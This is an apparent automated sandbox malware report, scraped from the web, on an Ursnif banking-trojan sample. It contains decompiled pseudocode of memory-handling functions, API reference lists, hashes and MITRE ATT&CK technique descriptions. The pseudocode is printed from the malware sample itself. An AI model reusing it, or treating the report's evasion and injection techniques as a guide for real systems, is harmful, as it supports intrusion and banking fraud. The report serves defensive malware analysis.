				_t61 = _t60 + 1;
				_t32 = ( <  ? _t60 : 0x10) - 0x10 + _t73;
				 *((intOrPtr*)(_t151 + _t126 + 0x30)) = dil;
				_t162 = _t61 + __rdx;
				if ( *_t162 == 0x20) goto 0x800014c6;
				if ( *_t162 != 9) goto 0x800014cd;
				goto 0x800014ba;
				r9b =  *((intOrPtr*)(_t151 + 0x30));
				_t155 = __rdx + _t126;
				_t55 = _t54 - _t61 + 1;
				goto 0x800014e3;
				r9b = dil;
				 *((intOrPtr*)(_t151 + 0x30)) = dil;
				_t64 =  <  ? _t55 : 0x10;
				r11d = 0x10;
				if (0x10 == 0) goto 0x80001524;
				_t56 =  *_t155;
				if (_t56 == dil) goto 0x80001524;
				if (_t56 == 0x20) goto 0x80001524;
				if (_t56 == 9) goto 0x80001524;
				_t14 = _t130 - 0x61; // -96
				_t113 = _t14 - 0x19;
				if (_t113 > 0) goto 0x80001518;
				 *((char*)(_t151 + 0x48 - _t155 + _t155)) = _t56 + 0xe0;
				r11d = r11d + _t73;
				if (_t113 != 0) goto 0x800014fc;
				_t65 = ( <  ? _t55 : 0x10) - r11d;
				 *((intOrPtr*)(_t151 + __rdx + 0x48)) = dil;
				if (r9b != dil) goto 0x80001546;
				r8d = 0x10;
				memcpy(_t182, _t180, _t176);
				if (_t173 == _t143) goto 0x80001591;
				if (1 <= 0) goto 0x80001568;
				if ( *_t173 == 0x20) goto 0x8000155f;
				if ( *_t173 != 9) goto 0x80001568;
				if (1 - 1 < 0) goto 0x80001551;
				if (1 == 1) goto 0x80001593;
				_t38 = _t148 - 1;
				if (_t38 <= 0) goto 0x8000158c;
				_t133 = _t38 + _t173 + 1;
				if ( *_t133 == 0x20) goto 0x80001583;
				if ( *_t133 != 9) goto 0x8000158c;
				if (_t38 + _t73 > 0) goto 0x80001579;
				goto 0x80001593;
				_t22 = _t148 + 1; // 0x1
				r8d = _t22;
				HeapAlloc(_t171, _t143, _t145);
				if (_t126 == _t143) goto 0x800015f8;
				r8d = 0;
				memcpy(_t148, ??);
				 *((intOrPtr*)(__rbx + _t126)) = dil;
				_t42 = E00000001180008C48(0xffffffff, _t151 + 0x48);
				r9d = 0;
				 *((long long*)(_t151 + 0x20)) = _t151 + 0x30;
				E00000001180005748(_t56 + 0xe0, _t42, __rbx,  *((intOrPtr*)(_t151 + 0xa0)), _t173 + 1, _t126);
				HeapFree(??, ??, ??);
				if (r14d == 0) goto 0x8000160a;
				goto 0x800013bb;
				return 0xb;
			}

APIs

memcpy.NTDLL ref: 0000000180001541
HeapAlloc.KERNEL32 ref: 000000018000159C
memcpy.NTDLL ref: 00000001800015B5
HeapFree.KERNEL32 ref: 00000001800015F2

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Heapmemcpy$AllocFree
String ID:
API String ID: 1496448200-0
Opcode ID: cdd274b2a0972057d5d3fa9f9dc430bb16684e370421a2ed3793fff496384978
Instruction ID: 12f6b3511e6ab994a39ab68529ae422f0e798305e72f5bbead824a43ac2e6bc8
Opcode Fuzzy Hash: cdd274b2a0972057d5d3fa9f9dc430bb16684e370421a2ed3793fff496384978
Instruction Fuzzy Hash: AE811331704A8CCDFBF7C52998443E97AC2A3DD7C2FA9C121F982076D5ED648B8A8301

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001208 Relevance: 5.1, APIs: 4, Instructions: 83
memoryCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00000001180001208(long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long* __r9, char _a8, long long _a16, long long _a24, long long _a32, intOrPtr* _a40) {
				char _v48;
				long long _v56;
				long long _t43;
				long long _t57;
				long long _t58;
				void* _t68;
				long long* _t73;
				void* _t75;

				_t56 = __rdx;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t43 =  *0x8000d4a0;
				r12d = r8d;
				_t75 = __rdx;
				if (__rdx == _t57) goto 0x80001304;
				if (r8d == 0) goto 0x80001304;
				EnterCriticalSection(??);
				asm("lock add dword [esi+0x40], 0x1");
				LeaveCriticalSection(??);
				_t7 =  &_a8; // -110
				r8d = 0;
				_v48 = 0;
				_a8 = 0;
				_v56 = _t57;
				if (E00000001180009994(r12d, __rdx, __rdx, _t68, _t7) != 0x7a) goto 0x800012fd;
				r8d = _a8;
				HeapAlloc(??, ??, ??);
				_t58 = _t43;
				if (_t43 == 0) goto 0x800012f8;
				_v48 = 0x10;
				_t14 =  &_a8; // -110
				_t73 = _t14;
				_v56 = __rcx + 0x72;
				if (E00000001180009994(r12d, _t75, _t56, _t43, _t73) != 0) goto 0x800012e8;
				 *__r9 = _t58;
				 *_a40 = _a8;
				goto 0x800012fd;
				HeapFree(??, ??, ??);
				goto 0x800012fd;
				asm("lock add dword [esi+0x40], 0xffffffff");
				goto 0x80001313;
				 *_t73 = _t58;
				 *_a40 = 0;
				return 0;
			}

APIs

EnterCriticalSection.KERNEL32(?,000000018000134F), ref: 0000000180001256
LeaveCriticalSection.KERNEL32 ref: 0000000180001265
HeapAlloc.KERNEL32 ref: 000000018000129C
HeapFree.KERNEL32 ref: 00000001800012F0

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterFreeLeave
String ID:
API String ID: 2939682908-0
Opcode ID: 0aae2bb15498bfce2a9550a8a73fe09b0bb207132fae4a23ee3c1e61430e7fbe
Instruction ID: a0890feeee0316dd0af96136dbcc6cf79a7537e396d31e91aa434a41704444e3
Opcode Fuzzy Hash: 0aae2bb15498bfce2a9550a8a73fe09b0bb207132fae4a23ee3c1e61430e7fbe
Instruction Fuzzy Hash: 6D314232204B88C7D761CB5AE84439AF7A4F79CBD4F548115EE9983B64DF38C64ACB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800081F0 Relevance: 5.1, APIs: 4, Instructions: 78
memoryCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E000000011800081F0(void* __edx, long long __rbx, signed short* __rcx, long long __rsi, signed int** __r8, intOrPtr* __r9, void* __r11) {
				signed int _t21;
				signed int _t28;
				signed int* _t38;
				int _t53;
				long long _t58;
				void* _t61;
				void* _t72;
				signed int* _t73;
				long _t75;
				long _t78;
				void* _t81;

				 *((long long*)(_t61 + 8)) = __rbx;
				 *((long long*)(_t61 + 0x10)) = _t58;
				 *((long long*)(_t61 + 0x18)) = __rsi;
				_t21 =  *__rcx & 0x0000ffff;
				_t38 = __rbx + 4;
				r11d = __edx;
				r10d = 0x57;
				if (__r11 - _t38 <= 0) goto 0x800082e1;
				_t28 =  *(__rbx +  &(__rcx[1])) & 0x0000ffff;
				if (__r11 -  &(__rcx[2]) < 0) goto 0x800082e1;
				if (_t21 == 0) goto 0x800082e1;
				if (_t21 - 0x200 > 0) goto 0x800082e1;
				if (_t28 == 0) goto 0x800082e1;
				if (_t28 - 0x200 > 0) goto 0x800082e1;
				r15d = 0x404;
				HeapAlloc(_t81, _t78, _t75);
				_t73 = _t38;
				if (_t38 == 0) goto 0x800082db;
				memset(_t72, _t53);
				 *_t73 = (_t21 & 0x0000fff0) << 3;
				memcpy(??, ??, ??);
				memcpy(??, ??, ??);
				 *__r8 = _t73;
				 *__r9 = r15d;
				r10d = 0;
				goto 0x800082e1;
				r10d = 8;
				return r10d;
			}

APIs

HeapAlloc.KERNEL32 ref: 0000000180008278
memset.NTDLL ref: 000000018000828E
memcpy.NTDLL ref: 00000001800082B4
memcpy.NTDLL ref: 00000001800082CA

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: memcpy$AllocHeapmemset
String ID:
API String ID: 609429373-0
Opcode ID: c4fa16f6dc2f2ba848d15b560345700d108723914946eadfda53ccda28d560ab
Instruction ID: 28a7b8e95bc2ced4d8e1beef03e6e9b8fa3c41881149a4efc87acd56f6b93b28
Opcode Fuzzy Hash: c4fa16f6dc2f2ba848d15b560345700d108723914946eadfda53ccda28d560ab
Instruction Fuzzy Hash: AA21E072204B9881EB95CF57E84039A7690FB89FC4F04C425FE8A17355EE38C759C308

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800030C8 Relevance: 5.1, APIs: 4, Instructions: 77memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,0000000180008793), ref: 000000018000310D
HeapAlloc.KERNEL32(?,?,?,0000000180008793), ref: 0000000180003126
memcpy.NTDLL ref: 000000018000314B
memcpy.NTDLL ref: 000000018000317D

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: memcpy$AllocHeaplstrlen
String ID:
API String ID: 2888080719-0
Opcode ID: f13b7d7e3ec6c9150a795e7257fff4343ad218865bc8e256d013ad43eeebd2c8
Instruction ID: d7cda782a7b16298d0386595c53ef50d9ac6af49b43f80025cb93dadd90a3a02
Opcode Fuzzy Hash: f13b7d7e3ec6c9150a795e7257fff4343ad218865bc8e256d013ad43eeebd2c8
Instruction Fuzzy Hash: 83219E72300B9891DB56DF17A9813E9B3A1F78CBD4F498521AE490B799DE38C68AC300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008C60 Relevance: 5.1, APIs: 4, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CA7
memset.NTDLL(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CC1

Part of subcall function 0000000180002464: LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476

HeapAlloc.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CED
InitializeCriticalSection.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008D3E

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: AllocHeap$CriticalInitializeLibraryLoadSectionmemset
String ID:
API String ID: 2387776105-0
Opcode ID: 231236229b59fafa602483bc217cbeaa5c95870d5847978078aa8a3bfdab2cdc
Instruction ID: 4870de9647b4eba85a0def977afe88a726f62592237ec59ed4fc2a31fcf765aa
Opcode Fuzzy Hash: 231236229b59fafa602483bc217cbeaa5c95870d5847978078aa8a3bfdab2cdc
Instruction Fuzzy Hash: 80315036200B5896EB56CF12E8143DA77A5F79CBD4F888126EE8D83795EF38D609C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006008 Relevance: 5.1, APIs: 4, Instructions: 68memorystringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,00000000,0000000180006189), ref: 0000000180006042
HeapAlloc.KERNEL32 ref: 0000000180006057
_snprintf.NTDLL ref: 00000001800060B9
lstrcpyA.KERNEL32 ref: 00000001800060DD

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: AllocHeap_snprintflstrcpylstrlen
String ID:
API String ID: 2416262065-0
Opcode ID: d259640750b129b37f8796bde76c5520b807ee9fb10f6e5ed3310e5deffcfd7e
Instruction ID: cd8941c1faf9c1b72c5725e61722f5b4f1580fba6f0a1dbc367b270ebdb23bd2
Opcode Fuzzy Hash: d259640750b129b37f8796bde76c5520b807ee9fb10f6e5ed3310e5deffcfd7e
Instruction Fuzzy Hash: 83316B36604B888BD7A5CF16E454B9AB7A5F38CBC4F048126EE9E83714DF39D545CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003E58 Relevance: 5.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 0000000180003EE6
HeapFree.KERNEL32 ref: 0000000180003EFA
HeapFree.KERNEL32 ref: 0000000180003F0E
HeapFree.KERNEL32 ref: 0000000180003F22

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: FreeHeap$ErrorLast
String ID:
API String ID: 2332451156-0
Opcode ID: a786c878c7dbed4c8c276b5234abe64ea54608898cee96c33fecb54f0875128f
Instruction ID: 57d54ecd6ba6b12e4082159e9fbcbac62f64b62c5c275490acec5f9711af8689
Opcode Fuzzy Hash: a786c878c7dbed4c8c276b5234abe64ea54608898cee96c33fecb54f0875128f
Instruction Fuzzy Hash: D5215E72200B8882EB97DB63D5413A973A5EB8DFC4F589115EE4D93799DF38CA89C300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005BDC Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000000,00000000,00000000,0000000180001A27), ref: 0000000180005C15
memcpy.NTDLL ref: 0000000180005C31
EnterCriticalSection.KERNEL32 ref: 0000000180005C45
LeaveCriticalSection.KERNEL32 ref: 0000000180005C72

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$AllocEnterHeapLeavememcpy
String ID:
API String ID: 224082080-0
Opcode ID: fae9b1d28c530db2aae286d3ecdb8edc3b69d7174c662bcadd6a252e0811932a
Instruction ID: 6c58b3867655a66680f731ed639b6ca29fd0989e7b58f2a4007a8aeeb493b1ec
Opcode Fuzzy Hash: fae9b1d28c530db2aae286d3ecdb8edc3b69d7174c662bcadd6a252e0811932a
Instruction Fuzzy Hash: 20112672604B5886E751CF02F888B9AB774F398BD5F958012EA9D43B54DF38C68AC740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001C00 Relevance: 5.0, APIs: 4, Instructions: 39memorystringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,?,00000001800022FC), ref: 0000000180001C29
HeapAlloc.KERNEL32(?,?,?,00000001800022FC), ref: 0000000180001C3F
memcpy.NTDLL(?,?,?,00000001800022FC), ref: 0000000180001C56
memset.NTDLL(?,?,?,00000001800022FC), ref: 0000000180001C68

Memory Dump Source

Source File: 00000005.00000002.246482348.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.246476489.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246496344.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.246506940.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: AllocHeaplstrlenmemcpymemset
String ID:
API String ID: 422472530-0
Opcode ID: 6855a2b0dbb2b49a0b21a1d0e345b578770580c558caf0e88c3664cb39e6b085
Instruction ID: bc1187ca6e9429620bd200782e7290a68718eb3a581ccfc4400d3cdfedcb2126
Opcode Fuzzy Hash: 6855a2b0dbb2b49a0b21a1d0e345b578770580c558caf0e88c3664cb39e6b085
Instruction Fuzzy Hash: 49014832214B8886EB45DF26A84039977A2F78CFC0F498121EE5943B15DF38E655C700

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\AEC4.tmp

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Windows Analysis Report
c2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd.exe

Function 000000018000508C Relevance: 18.2, APIs: 12, Instructions: 241
memoryregistrythreadCOMMONCrypto

Function 0000000180005CA4 Relevance: 7.6, APIs: 5, Instructions: 88
filenativeCOMMON

Function 0000000180004F1C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102
memoryCOMMON

Function 0000000180008708 Relevance: 6.1, APIs: 4, Instructions: 70
memorysynchronizationCOMMON

Function 0000000180007B94 Relevance: 4.6, APIs: 3, Instructions: 131
memoryCOMMON

Function 0000000180002464 Relevance: 4.5, APIs: 3, Instructions: 30
libraryCOMMON

Function 0000000180006DCC Relevance: 3.8, APIs: 3, Instructions: 62
stringmemoryCOMMON

Function 000001FF41C23EDC Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 225
COMMON

Function 00000001800025EC Relevance: 3.0, APIs: 2, Instructions: 14
synchronizationCOMMON

Function 000001FF41C23880 Relevance: 1.7, APIs: 1, Instructions: 154
memoryCOMMON

Function 000001FF41C21C0B Relevance: 1.6, APIs: 1, Instructions: 145
COMMON